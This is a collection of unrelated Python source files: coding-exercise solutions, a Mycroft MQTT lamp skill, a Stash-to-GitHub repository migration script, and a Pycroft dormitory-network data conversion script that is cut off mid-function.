+{"seq_id":"198536421","text":"# Basic Calculator II\n# \n# Implement a basic calculator to evaluate a simple expression string.\n# \n# The expression string contains only non-negative integers, +, -, *, / operators and empty spaces . The integer division should truncate toward zero.\n# \n# You may assume that the given expression is always valid.\n# \n# Some examples:\n# \"3+2*2\" = 7\n# \" 3/2 \" = 1\n# \" 3+5 / 2 \" = 5\n# Note: Do not use the eval built-in library function.\n\n# Solution:\n# - Use two stack to track bracket and expressions. \n# \n\nclass Solution:\n # @param {string} s\n # @return {integer}\n def calculate(self, s):\n def evaluate(tokens):\n if len(tokens) == 1:\n return tokens[0]\n if len(tokens) == 3:\n a, b, c = tokens\n result = simple(a,b,c)\n if isinstance(result, int):\n return result\n else:\n return None\n\n stack = []\n brackets = []\n for tok in tokens:\n if tok == '(':\n brackets.append(len(stack))\n stack.append(tok)\n elif tok == ')':\n # A bracket is closed, directly evaluate it. \n last_open = brackets.pop()\n expression = stack[last_open+1:]\n stack = stack[:last_open] + [evaluate(expression)]\n elif type(tok) == type(1):\n if len(stack) > 1 and isinstance(stack[-2], int) and stack[-1] == '*':\n # Process right away, since left operand is already digit\n stack.pop()\n multiplier = stack.pop()\n stack.append(multiplier * tok)\n elif len(stack) > 1 and isinstance(stack[-2], int) and stack[-1] == '/':\n # Process right away, since left operand is already a digit\n stack.pop()\n numerator = stack.pop()\n stack.append(numerator // tok)\n else:\n stack.append(tok)\n elif tok in '+-':\n # All closed bracket should already been processed in the stack\n # All multiply or divide on the left are already calculated \n # Therefore our concern about do plus/minus calculation is \"Whether there's a multiply/divide on the right\"\n # So here, we do the plus/minus calculation if we found a +/- on the right. \n if len(stack) > 2:\n a, b, c = stack[-3:]\n result = simple(a, b, c)\n if result != None:\n stack = stack[:-3] + [result, tok]\n else:\n stack.append(tok)\n else:\n stack.append(tok)\n else:\n stack.append(tok)\n return evaluate(stack)\n \n\n def parse(s):\n # Parse the input string into tokens\n s = s.replace('+', ' + ')\n s = s.replace('-', ' - ')\n s = s.replace('*', ' * ')\n s = s.replace('/', ' / ')\n s = s.replace('(', ' ( ')\n s = s.replace(')', ' ) ')\n tokens = [int(tok) if tok.isdigit() else tok for tok in s.split() if tok.strip() != '']\n return tokens\n \n def simple(a, b, c):\n if isinstance(a, int) and isinstance(c, int): \n if b == '+':\n return a + c\n if b == '-':\n return a - c\n if b == '*':\n return a * c\n if b == '/':\n return a//c\n return None\n \n if a == '(' and c == ')' and isinstance(b, int):\n return b\n return None\n \n\n return evaluate(parse(s))\n","sub_path":"227_BasicCalculator2/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"448992434","text":"from __future__ import print_function\n\n\ndef fibs():\n a = 1\n b = 1\n while 1:\n yield a\n a, b = b, a + b\n\nif __name__ == '__main__':\n f = fibs()\n for x in xrange(100):\n print(f.next())\n","sub_path":"fibs.py","file_name":"fibs.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"219517337","text":"# Copyright (c) 2014 Red Hat, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom zaqarclient.queues.v1 import core\n\n\nclass Flavor(object):\n\n def __init__(self, client, name,\n pool, auto_create=True, **capabilities):\n self.client = client\n\n self.name = name\n self.pool = pool\n self.capabilities = capabilities\n\n if auto_create:\n self.ensure_exists()\n\n def ensure_exists(self):\n \"\"\"Ensures pool exists\n\n This method is not race safe,\n the pool could've been deleted\n right after it was called.\n \"\"\"\n req, trans = self.client._request_and_transport()\n\n data = {'pool': self.pool,\n 'capabilities': self.capabilities}\n\n core.flavor_create(trans, req, self.name, data)\n\n def delete(self):\n req, trans = self.client._request_and_transport()\n core.flavor_delete(trans, req, self.name)\n","sub_path":"zaqarclient/queues/v1/flavor.py","file_name":"flavor.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"209109865","text":"import paho.mqtt.client as mqtt\nimport time\n\n# Importing IntentBuilder\nfrom adapt.intent import IntentBuilder\n# Importing MycroftSkill class\nfrom mycroft.skills.core import MycroftSkill\n\nbathroom_topic_1 = \"lamp_1\"\nbathroom_topic_2 = \"lamp_2\"\nbathroom_topic_3 = \"lamp_3\"\n\ndef change_color(client, r, g, b, intensity, topic):\n if r != '':\n client.publish(topic, \"r\" + str(r))\n time.sleep(0.05)\n if g != '':\n client.publish(topic, \"g\" + str(g))\n time.sleep(0.05)\n if b != '':\n client.publish(topic, \"b\" + str(b))\n time.sleep(0.05)\n if intensity != '':\n client.publish(topic, \"i\" + str(intensity))\n\n# Creating HelloWorldSKill extending MycroftSkill\nclass BathroomNightLight(MycroftSkill):\n \n def __init__(self):\n super(BathroomNightLight, self).__init__(\"BathroomNightLight\")\n\n def initialize(self):\n # Creating GreetingsIntent requiring Ventilation vocab\n charging = IntentBuilder(\"LightIntent\").require(\"Light\").build()\n # Associating a callback with the Intent\n self.register_intent(charging, self.handle_charging)\n \n def handle_charging(self):\n broker_ip = \"192.168.1.198\"\n broker_port = 1883\n client_3 = mqtt.Client()\n client_3.connect(broker_ip, broker_port)\n r = 45\n g = 157\n b = 0\n i = 5\n change_color(client_3, r, g, b, i, bathroom_topic_1)\n change_color(client_3, r, g, b, i, bathroom_topic_2)\n change_color(client_3, r, g, b, i, bathroom_topic_3)\n # Sending a command to mycroft, speak Greetings Dialog\n self.speak_dialog(\"Light\")\n \n def stop(self):\n pass\n\n\ndef create_skill():\n return BathroomNightLight()","sub_path":"mycroft/turn_on_night_bathroom_light.mycroftai/.ipynb_checkpoints/__init__-checkpoint.py","file_name":"__init__-checkpoint.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"561428632","text":"#\n# @lc app=leetcode id=64 lang=python3\n#\n# [64] Minimum Path Sum\n#\n\n# @lc code=start\nclass Solution: \n def move(self, i, j):\n if i >= self.height:\n return None\n if j >= self.width:\n return None\n if i == self.height - 1 and j == self.width - 1:\n return self.grid[i][j]\n if self.ways[i][j] != None:\n return self.ways[i][j]\n down = self.move(i+1, j)\n right = self.move(i, j+1)\n if down == None and right == None:\n self.ways[i][j] = self.grid[i][j]\n elif down == None:\n self.ways[i][j] = self.grid[i][j] + right\n elif right == None:\n self.ways[i][j] = self.grid[i][j] + down\n else:\n self.ways[i][j] = self.grid[i][j] + min(down, right)\n return self.ways[i][j]\n\n\n def minPathSum(self, grid: List[List[int]]) -> int:\n self.grid = grid\n self.height = len(grid)\n if self.height == 0:\n return 0\n self.width = len(grid[0])\n if self.width == 0:\n return 0\n self.ways = []\n for i in range(self.height):\n self.ways.append([None] * self.width)\n \n return self.move(0,0)\n# @lc code=end\n\n","sub_path":"code/64.minimum-path-sum.py","file_name":"64.minimum-path-sum.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"534812724","text":"#!/usr/bin/env python3\n#\n# Copyright 2016 Brigham Young University\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nimport json\nimport requests\nimport datetime\nimport shutil\nimport yaml\nimport plac\nimport pyaml\nimport config\nimport subprocess\nfrom prompt_toolkit import prompt\nfrom slugify import slugify\n\ndef stash_rest(path, method):\n response = getattr(requests, method)('https://developer.byu.edu/repo/rest/api/1.0{}'.format(path), \n auth=(config.byu['username'], config.byu['password']))\n response.raise_for_status()\n return response\n\ndef get_groups_on_project(project_key):\n response = stash_rest('/projects/{}/permissions/groups?limit=1000'.format(project_key), 'get')\n groups = response.json()['values']\n return groups\n\ndef delete_group_from_project(project_key, group):\n try:\n stash_rest('/projects/{}/permissions/groups?name={}'.format(project_key, group), 'delete')\n except Exception as e:\n print(e)\n\ndef get_users_on_project(project_key):\n response = stash_rest('/projects/{}/permissions/users?limit=1000'.format(project_key), 'get')\n users = response.json()['values']\n return users\n\ndef delete_user_from_project(project_key, user):\n try:\n stash_rest('/projects/{}/permissions/users?name={}'.format(project_key, user), 'delete')\n except Exception as e:\n print(e)\n\ndef get_groups_on_repo(project_key, repo_slug):\n response = stash_rest('/projects/{}/repos/{}/permissions/groups?limit=1000'.format(project_key, repo_slug), 'get')\n groups = response.json()['values']\n return groups\n\ndef delete_group_from_repo(project_key, repo_slug, group):\n try:\n stash_rest('/projects/{}/repos/{}/permissions/groups?name={}'.format(project_key, repo_slug, group), 'delete')\n except Exception as e:\n print(e)\n\ndef get_users_on_repo(project_key, repo_slug):\n response = stash_rest('/projects/{}/repos/{}/permissions/users?limit=1000'.format(project_key, repo_slug), 'get')\n users = response.json()['values']\n return users\n\ndef delete_user_from_repo(project_key, repo_slug, user):\n try:\n stash_rest('/projects/{}/repos/{}/permissions/users?name={}'.format(project_key, repo_slug, user), 'delete')\n except Exception as e:\n print(e)\n\ndef remove_access_to_project(project_key):\n print('Removing all but admin access from the {} project'.format(project_key))\n stash_rest('/projects/{}/permissions/PROJECT_ADMIN/all?allow=true'.format(project_key), 'post')\n groups = get_groups_on_project(project_key)\n for group in groups:\n delete_group_from_project(project_key, group['group']['name'])\n users = get_users_on_project(project_key)\n for user in users:\n delete_user_from_project(project_key, user['user']['name'])\n\ndef remove_access_to_repo(project_key, repo_slug):\n print('Removing all but admin access from the {} {} repo'.format(project_key, repo_slug))\n groups = get_groups_on_repo(project_key, repo_slug)\n for group in groups:\n delete_group_from_repo(project_key, repo_slug, group['group']['name'])\n users = 
get_users_on_repo(project_key, repo_slug)\n for user in users:\n delete_user_from_repo(project_key, repo_slug, user['user']['name'])\n\ndef get_all_projects():\n \"\"\"\n projects look like {'id': 1, 'public': False, 'link': {'rel': 'self', 'url': '/projects/AAAA'}, 'name': 'ACME Project', 'description': 'ACME Project description', 'links': {'self': [{'href': 'https://developer.byu.edu/repo/projects/AAAA'}]}, 'key': 'AAAA', 'type': 'NORMAL'}\n \"\"\"\n response = stash_rest('/projects?limit=1000', 'get')\n projects = response.json()['values']\n print('Found {} projects'.format(len(projects)))\n return projects\n\ndef get_all_repos_in_project(project):\n \"\"\"\n repos look like {'scmId': 'git', 'public': False, 'name': 'acmeRepo', 'id': 2, 'project': {see project structure above}, 'links': {'clone': [{'href': 'ssh://git@pentagon7.byu.edu:7999/aaaa/acmerepo.git', 'name': 'ssh'}, {'href': 'https://@developer.byu.edu/repo/scm/aaaa/acmerepo.git', 'name': 'http'}], 'self': [{'href': 'https://developer.byu.edu/repo/projects/AAAA/repos/acmerepo/browse'}]}, 'forkable': True, 'state': 'AVAILABLE', 'statusMessage': 'Available', 'slug': 'acmerepo', 'cloneUrl': 'https://@developer.byu.edu/repo/scm/aaaa/acmerepo.git', 'link': {'rel': 'self', 'url': '/projects/AAAA/repos/acmerepo/browse'}}\n \"\"\"\n response = stash_rest('/projects/{}/repos?limit=1000'.format(project['key']), 'get')\n repos = response.json()['values']\n print('Found {} repos in the {} project'.format(len(repos), project['key']))\n return repos\n\ndef migrate():\n projects = get_all_projects()\n repo_count=0\n for project in projects:\n print(\"Working on project with key {}\".format(project['key']))\n remove_access_to_project(project['key'])\n repos = get_all_repos_in_project(project)\n for repo in repos:\n print('Working with repo {}'.format(repo['name']))\n remove_access_to_repo(project['key'], repo['slug'])\n github_repo_name = 'stash_{}_{}'.format(slugify(project['name']), slugify(repo['name']))\n if slugify(repo['name']) == slugify(project['name']):\n github_repo_name = 'stash_{}'.format(slugify(repo['name']))\n body = {'name':github_repo_name,'description':'Migrated stash project {} repo {}'.format(project['name'], repo['name']),'homepage':'https://developer.byu.edu/repo/projects/{}/repos/{}'.format(project['key'], repo['name']),'private':True,'has_issues':True,'has_wiki':True,'has_downloads':True}\n response = requests.post('https://api.github.com/orgs/byu-oit-appdev/repos', auth=(config.github['username'], config.github['password']), json=body, headers={'Content-Type': 'application/json'})\n if response.status_code != 201:\n print('Error creating repo. 
Status code was {} and body was {}'.format(response.status_code, response.text))\n else:\n print(' Cloning...')\n subprocess.check_call('git clone --mirror {} {}'.format(repo['cloneUrl'], github_repo_name), shell=True)\n os.chdir(github_repo_name)\n print(' Pushing to new repo...')\n subprocess.check_call('git push --mirror https://github.com/byu-oit-appdev/' + github_repo_name, shell=True)\n print(' Removing the local clone...')\n os.chdir('..')\n shutil.rmtree(github_repo_name)\n repo_count += 1\n print('{} repos added to github'.format(repo_count))\n\ndef last_commit():\n when_migrated = datetime.datetime.today() - datetime.timedelta(days=3)\n for project in get_all_projects():\n for repo in get_all_repos_in_project(project):\n try:\n response = stash_rest('/projects/{}/repos/{}/commits?limit=1'.format(project['key'], repo['slug']), 'get')\n seconds_from_epoch = float(response.json()['values'][0]['authorTimestamp'])/1000\n when_commited = datetime.datetime.utcfromtimestamp(seconds_from_epoch)\n print('Repo {} {} committed to at {}'.format(project['key'], repo['name'], when_commited))\n if when_commited > when_migrated:\n print('may have been committed to after the migration')\n print(pyaml.dump(response.json()))\n print('==========')\n except Exception as e:\n print(e)\n\ndef remove_access():\n for project in get_all_projects():\n remove_access_to_project(project['key'])\n for repo in get_all_repos_in_project(project):\n remove_access_to_repo(project['key'], repo['slug'])\n \ndef main(command):\n if command == 'migrate':\n migrate()\n elif command == 'remove_access':\n remove_access()\n elif command == 'last_commit':\n last_commit()\n\nif __name__ == '__main__':\n plac.call(main)\n","sub_path":"stash_migration.py","file_name":"stash_migration.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"271596983","text":"import random\n\nNOMBRES = [ 'Ana','Pedro','Pablo', 'Ernesto','Ariel','Carlos','Luis','Oscar', 'Alicia','Maria','Brenda']\n\nCIUDADES = ['Managua','Masaya','Matagalpa', 'Chinandega','Somoto', 'Rivas']\n\n\ndef generar_diccionario_estudiantes():\n estudiantes = {}\n\n for nombre in NOMBRES:\n estudiantes = {\n\n 'Nombre': random.choice(NOMBRES),\n 'edad': random.randrange(16, 30),\n 'anio': random.randrange(1, 5),\n 'cuidad': random.choice(CIUDADES)\n\n }\n\n return estudiantes\n\nprint = generar_diccionario_estudiantes()\n","sub_path":"ejdiccionario3.py","file_name":"ejdiccionario3.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"504636737","text":"import countryinfo\nimport chardet\n\n# for country in countryinfo.countries:\n# \tprint country\n\n#ORIGIN ABBREVIATIONS\ncontinents = [\n{'name': ['Africa'], 'abb': ['AF']},\n{'name': ['Antarctica'], 'abb': ['AN']},\n{'name': ['Asia'], 'abb': ['AS']},\n{'name': ['Australia'], 'abb': ['AU']},\n{'name': ['Europe'], 'abb': ['EU']},\n{'name': ['North America'], 'abb': ['NA']},\n{'name': ['South America'], 'abb': ['SA']},\n{'name': ['Unknown'], 'abb': ['XX']}\n]\n\ndef getAbb(string):\n\tif isinstance(string, unicode):\n\t\tdecoded = string.decode('utf-8')\n\t\tencoded = decoded.encode('ascii')\n\tif encoded.rstrip('\\n') == \"Not Available\":\n\t\treturn 'XX'\n\tfor country in countryinfo.countries:\n\t\tif (country['name'] in encoded or encoded in country['name']):\n\t\t\tfor continent in continents:\n\t\t\t\tif continent['name'][0] in country['continent']:\n\t\t\t\t\treturn continent['abb'][0]\n\t\t\treturn 'XX'","sub_path":"origin.py","file_name":"origin.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"280846934","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2014 The Pycroft Authors. See the AUTHORS file.\n# This file is part of the Pycroft project and licensed under the terms of\n# the Apache License, Version 2.0. See the LICENSE file for details.\nfrom datetime import datetime, time\nimport ipaddr\n\nfrom mysql import session as my_session, Wheim, Nutzer, Subnet, Computer\n\nfrom pycroft import model\nfrom pycroft.model import dormitory, session, port as port_model, user, host, property, logging\nfrom pycroft.helpers.user import hash_password\nfrom pycroft.model.dns import ARecord, CNAMERecord\n\ndef do_convert():\n houses = {}\n patch_ports = []\n switch_ports = []\n rooms = []\n switches = {}\n users = []\n ips = []\n net_devices = []\n\n root_room = None\n\n for wheim in my_session.query(Wheim):\n new_house = dormitory.Dormitory(number=wheim.hausnr, short_name = wheim.kuerzel, street=wheim.str)\n houses[wheim.wheim_id] = new_house\n\n for port in wheim.port_qry():\n new_room = dormitory.Room.q.filter_by(number=port.zimmernr,\n level=port.etage,\n dormitory=new_house).first()\n if new_room is None:\n new_room = dormitory.Room(number=port.zimmernr, level=port.etage, inhabitable=True, dormitory=new_house)\n rooms.append(new_room)\n new_port = port_model.PatchPort(name=\"%s/%s\" % (port.etage, port.zimmernr), room=new_room)\n patch_ports.append(new_port)\n\n if port.ip not in switches:\n pub_ip = port.ip.replace(\"10.10\", \"141.30\")\n computer = my_session.query(Computer).filter(Computer.c_ip == pub_ip).first()\n hostname = computer.c_hname\n mac = computer.c_etheraddr\n new_switch_net_device = host.SwitchNetDevice(mac=mac)\n mgmt_ip = host.Ip(address=pub_ip, net_device=new_switch_net_device)\n new_switch = host.Switch(name=hostname, management_ip=mgmt_ip.address)\n new_switch_net_device.host = new_switch\n net_devices.append(new_switch_net_device)\n ips.append(mgmt_ip)\n switches[port.ip] = new_switch\n new_swport = port_model.SwitchPort(name=port.port, switch=switches[port.ip])\n switch_ports.append(new_swport)\n new_port.destination_port = new_swport\n\n\n if int(wheim.wheim_id) == 1 and new_room.number == \"41\" and int(new_room.level) == 1:\n root_room = new_room\n\n server_room_wu5_keller = dormitory.Room(number=\"Keller\", level=\"0\", inhabitable=False, dormitory_id=1)\n server_room_wu9_dach = dormitory.Room(number=\"Dach\", level=\"16\", inhabitable=False, dormitory_id=3)\n server_room_wu11_dach = dormitory.Room(number=\"Dach\", level=\"17\", inhabitable=False, dormitory_id=4)\n rooms += [server_room_wu11_dach, server_room_wu5_keller, server_room_wu9_dach]\n\n root = user.User(login=\"ag_dsn\", name=\"System User\", registration_date=datetime.today(), passwd_hash=hash_password(\"test\"))\n root.room = root_room\n for switch in switches.values():\n switch.user_id = root.id\n\n\n vlan_houses = {'Wu1': (5,),\n 'Wu3': (6,),\n 'Wu7': (2,),\n 'Wu11': (4,),\n 'ZellescherWeg': (7,8,9,10,11),\n 'Wu5': (1,),\n 'Wu9': (3,),\n 'UNEPWeb': (10,)}\n\n vlan_tags = {'Wu1': 11,\n 'Wu3': 13,\n 'Wu7': 17,\n 'Wu11': 5,\n 'ZellescherWeg': 41,\n 'Wu5': 15,\n 'Wu9': 19,\n 'UNEPWeb': 348}\n\n vlans = {}\n\n subnets = {}\n for subnet in my_session.query(Subnet):\n replaced_subnet_ip = subnet.net_ip.replace(\"10.10\", \"141.30\")\n new_subnet = dormitory.Subnet(address=str(ipaddr.IPv4Network(\"%s/%s\" % (replaced_subnet_ip, subnet.netmask))),\n dns_domain=subnet.domain,\n gateway=subnet.default_gateway,\n ip_type=\"4\")\n subnets[subnet.subnet_id] = new_subnet\n\n vlans[subnet.vlan_name] 
= dormitory.VLAN(name=subnet.vlan_name,\n tag=vlan_tags[subnet.vlan_name])\n\n new_subnet.vlans.append(vlans[subnet.vlan_name])\n for house in vlan_houses[subnet.vlan_name]:\n houses[house].vlans.append(vlans[subnet.vlan_name])\n\n for ip in ips:\n pub_ip = ip.address.replace(\"10.10\", \"141.30\")\n computer_query = my_session.query(Computer).filter(Computer.c_ip == pub_ip)\n computer = computer_query.first()\n ip.subnet = subnets[computer.c_subnet_id]\n\n\n property_groups = {\"verstoß\": property.PropertyGroup(name=u\"Verstoß\"),\n \"bewohner\": property.PropertyGroup(name=u\"Bewohner\"),\n \"admin\": property.PropertyGroup(name=u\"Admin\"),\n \"nutzerverwalter\": property.PropertyGroup(\n name=u\"Nutzerverwalter\"),\n \"finanzen\": property.PropertyGroup(name=u\"Finanzen\"),\n \"root\": property.PropertyGroup(name=u\"Root\"),\n \"hausmeister\": property.PropertyGroup(\n name=u\"Hausmeister\"),\n \"exaktiv\": property.PropertyGroup(name=u\"Exaktiv\"),\n \"tmpausgezogen\": property.PropertyGroup(\n name=u\"tmpAusgezogen\")}\n\n properties_all = [property.Property(name=\"no_internet\",\n property_group=property_groups[\"verstoß\"]),\n property.Property(name=\"internet\",\n property_group=property_groups[\"bewohner\"]),\n property.Property(name=\"mail\",\n property_group=property_groups[\"bewohner\"]),\n property.Property(name=\"ssh_helios\",\n property_group=property_groups[\"bewohner\"]),\n property.Property(name=\"homepage_helios\",\n property_group=property_groups[\"bewohner\"]),\n property.Property(name=\"no_internet\",\n property_group=property_groups[\"tmpausgezogen\"])]\n\n\n session.session.add_all(houses.values())\n session.session.add_all(patch_ports)\n session.session.add_all(rooms)\n session.session.add_all(switches.values())\n session.session.add_all(ips)\n session.session.add_all(net_devices)\n session.session.add_all(switch_ports)\n session.session.add_all(property_groups.values())\n session.session.add_all(properties_all)\n session.session.add(root)\n session.session.add_all(subnets.values())\n session.session.add_all(vlans.values())\n\n logs = []\n user_hosts = []\n user_net_devices = []\n ips = []\n a_records = []\n cname_records = []\n\n for old_user in my_session.query(Nutzer):\n user_room = dormitory.Room.q.filter_by(\n dormitory_id=houses[old_user.wheim_id].id, level=old_user.etage,\n number=old_user.zimmernr).first()\n if old_user.status in [1,2,4,5,6,7,12]:\n if user_room is not None:\n #if user_room is None:\n # print str(old_user.nutzer_id)+\" \"+str(old_user.status)+\" \"+str(houses[old_user.wheim_id].id)+\" \"+str(old_user.etage)+old_user.zimmernr\n new_user = user.User(id=old_user.nutzer_id, login=old_user.unix_account,\n name=old_user.vname + \" \" + old_user.name, room_id=user_room.id\n ,\n registration_date=datetime.combine(old_user.anmeldedatum,time()))\n\n computer = my_session.query(Computer).filter(\n Computer.nutzer_id == old_user.nutzer_id\n ).first()\n\n new_host = host.UserHost(user=new_user, room=user_room)\n user_hosts.append(new_host)\n\n new_net_device = host.UserNetDevice(mac=computer.c_etheraddr,\n host=new_host)\n user_net_devices.append(new_net_device)\n\n new_ip = host.Ip(address=computer.c_ip, net_device=new_net_device,\n subnet=subnets[computer.c_subnet_id])\n ips.append(new_ip)\n\n new_a_record = ARecord(name=computer.c_hname,\n address=new_ip, host=new_host)\n a_records.append(new_a_record)\n\n if (computer.c_alias is not None) and (len(computer.c_alias) is not 0):\n new_cname_record = CNAMERecord(name=computer.c_alias,\n 
record_for=new_a_record, host=new_host)\n cname_records.append(new_cname_record)\n\n if (old_user.comment is not None) and (len(old_user.comment) is not 0):\n new_log = logging.UserLogEntry(message=u\"Alte Kommentare: \"+\n unicode(old_user.comment,\n errors=\"ignore\"),\n timestamp=datetime.now(), author=root, user=new_user)\n logs.append(new_log)\n users.append(new_user)\n\n\n session.session.add_all(users)\n session.session.add_all(logs)\n session.session.add_all(user_hosts)\n session.session.add_all(user_net_devices)\n session.session.add_all(ips)\n session.session.add_all(a_records)\n session.session.add_all(cname_records)\n\n ips = []\n server_net_devices = []\n a_records = []\n server_hosts = []\n\n #Server\n #TODO subnet for 141.76 nets\n #Atlantis\n atlantis_net_device = host.ServerNetDevice(mac=\"00:e0:81:b1:3f:0e\")\n server_net_devices.append(atlantis_net_device)\n atlantis_ip_1 = host.Ip(address=\"141.30.228.39\",net_device=atlantis_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(atlantis_ip_1)\n #atlantis_ip_2 = host.Ip(address=\"141.76.119.130\",net_device=atlantis_net_device)\n #ips.append(atlantis_ip_2)\n atlantis_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n atlantis_net_device.host = atlantis_host\n server_hosts.append(atlantis_host)\n atlantis_a_record = host.ARecord(host=atlantis_host, name=\"atlantis.wh2.tu-dresden.de\",\n address=atlantis_ip_1)\n a_records.append(atlantis_a_record)\n\n #Seth\n seth_net_device = host.ServerNetDevice(mac=\"00:04:23:8e:b9:91\")\n server_net_devices.append(seth_net_device)\n seth_ip_1 = host.Ip(address=\"141.30.228.2\",net_device=seth_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(seth_ip_1)\n #seth_ip_2 = host.Ip(address=\"141.76.119.134\",net_device=seth_net_device)\n #ips.append(seth_ip_2)\n seth_host = host.ServerHost(room=server_room_wu5_keller, user=root)\n seth_net_device.host = seth_host\n server_hosts.append(seth_host)\n seth_a_record = host.ARecord(host=seth_host, name=\"seth.wh2.tu-dresden.de\",\n address=seth_ip_1)\n a_records.append(seth_a_record)\n\n #Ramses\n ramses_net_device = host.ServerNetDevice(mac=\"00:04:23:9a:fe:86\")\n server_net_devices.append(ramses_net_device)\n ramses_ip = host.Ip(address=\"141.30.228.4\",net_device=ramses_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(ramses_ip)\n ramses_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n ramses_net_device.host = ramses_host\n server_hosts.append(ramses_host)\n ramses_a_record = host.ARecord(host=ramses_host, name=\"ramses.wh2.tu-dresden.de\",\n address=ramses_ip)\n a_records.append(ramses_a_record)\n\n #Helios\n helios_net_device = host.ServerNetDevice(mac=\"00:e0:81:b2:d4:b0\")\n server_net_devices.append(helios_net_device)\n helios_ip = host.Ip(address=\"141.30.228.7\",net_device=helios_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(helios_ip)\n helios_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n helios_net_device.host = helios_host\n server_hosts.append(helios_host)\n helios_a_record = host.ARecord(host=helios_host, name=\"helios.wh2.tu-dresden.de\",\n address=helios_ip)\n a_records.append(helios_a_record)\n\n #Gizeh\n gizeh_net_device = host.ServerNetDevice(mac=\"00:07:e9:10:d3:9a\")\n 
server_net_devices.append(gizeh_net_device)\n gizeh_ip = host.Ip(address=\"141.30.226.4\",net_device=gizeh_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh7.tu-dresden.de\").one())\n ips.append(gizeh_ip)\n gizeh_host = host.ServerHost(room=server_room_wu11_dach, user=root)\n gizeh_net_device.host = gizeh_host\n server_hosts.append(gizeh_host)\n gizeh_a_record = host.ARecord(host=gizeh_host, name=\"gizeh.wh7.tu-dresden.de\",\n address=gizeh_ip)\n a_records.append(gizeh_a_record)\n\n #Kerberos\n kerberos_net_device = host.ServerNetDevice(mac=\"00:04:23:dd:ee:e5\")\n server_net_devices.append(kerberos_net_device)\n kerberos_ip = host.Ip(address=\"141.30.228.3\",net_device=kerberos_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(kerberos_ip)\n kerberos_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n kerberos_net_device.host = kerberos_host\n server_hosts.append(kerberos_host)\n kerberos_a_record = host.ARecord(host=kerberos_host, name=\"kerberos.wh2.tu-dresden.de\",\n address=kerberos_ip)\n a_records.append(kerberos_a_record)\n\n #radio\n radio_net_device = host.ServerNetDevice(mac=\"00:16:3e:27:c0:b3\")\n server_net_devices.append(radio_net_device)\n radio_ip = host.Ip(address=\"141.30.228.6\",net_device=radio_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(radio_ip)\n radio_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n radio_net_device.host = radio_host\n server_hosts.append(radio_host)\n radio_a_record = host.ARecord(host=radio_host, name=\"radio.wh2.tu-dresden.de\",\n address=radio_ip)\n a_records.append(radio_a_record)\n\n #exma\n exma_net_device = host.ServerNetDevice(mac=\"00:16:3e:54:75:af\")\n server_net_devices.append(exma_net_device)\n exma_ip = host.Ip(address=\"141.30.228.5\",net_device=exma_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(exma_ip)\n exma_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n exma_net_device.host = exma_host\n server_hosts.append(exma_host)\n exma_a_record = host.ARecord(host=exma_host, name=\"exma.wh2.tu-dresden.de\",\n address=exma_ip)\n a_records.append(exma_a_record)\n\n #projecthost\n projecthost_net_device = host.ServerNetDevice(mac=\"00:16:3e:57:b2:25\")\n server_net_devices.append(projecthost_net_device)\n projecthost_ip = host.Ip(address=\"141.30.228.10\",net_device=projecthost_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(projecthost_ip)\n projecthost_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n projecthost_net_device.host = projecthost_host\n server_hosts.append(projecthost_host)\n 